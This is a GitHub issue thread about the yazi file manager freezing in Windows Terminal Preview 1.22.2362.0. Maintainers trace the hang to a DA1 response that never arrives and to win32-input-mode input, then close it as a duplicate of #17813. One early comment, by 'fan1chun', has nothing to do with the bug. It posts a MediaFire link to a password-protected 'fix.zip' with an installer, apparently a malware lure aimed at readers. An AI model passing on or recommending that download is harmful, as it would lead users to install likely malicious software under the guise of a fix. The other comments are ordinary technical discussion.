### ISSUE TITLE
yazi not working in Preview v1.22.2362.0

### ISSUE THREAD

**Issue by doongjohn** [microsoft/terminal#17823] opened 2024-08-29 07:02 UTC
### Windows Terminal version

1.22.2362.0

### Windows build number

10.0.22631.4037

### Other Software

yazi 0.3.2 <https://github.com/sxyazi/yazi/releases/tag/v0.3.2>

### Steps to reproduce

Run yazi in any shell (powershell, cmd, nu, ...)

### Expected Behavior

It should work. It works in [Preview v1.21.1772.0](https://github.com/microsoft/terminal/releases/tag/v1.21.1772.0)

### Actual Behavior

1. It takes a while to start yazi.
2. When it opens, yazi is not responding to any input.

**Comment by fan1chun** [comment] 2024-08-29 07:03
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by j4james** [comment] 2024-08-29 13:40
I think this is possibly another case of #17813. If I run yazi with the debug tap, I can see it sending a `DA1` request, and I can see Windows Terminal responding, but yazi is clearly not receiving that response, because you see it waiting for a couple of seconds before it times out and proceeds with other queries.

And from a brief scan of the [crossterm](https://github.com/crossterm-rs/crossterm) source (which I think is what yazi is using), I can see they are setting the `ENABLE_VIRTUAL_TERMINAL_PROCESSING` mode, but not the `ENABLE_VIRTUAL_TERMINAL_INPUT` mode.

That said, I'm not entirely sure what's happening after it as started up. I suspect that might be related to win32-input-mode somehow, because if I type in the debug pane (which sends through basic VT input sequences), I can get yazi to respond. It's only when Windows Terminal is sending the win32-input-mode sequences that it fails to respond.

**Comment by lhecker** [comment] 2024-09-03 14:20
I'll be closing this as a duplicate of #17813. (Thanks for the report though!) I tested this with #17833 and it seems to work now. /dup #17813

**Closed** 2024-09-03 14:20 UTC
Labels: Issue-Bug
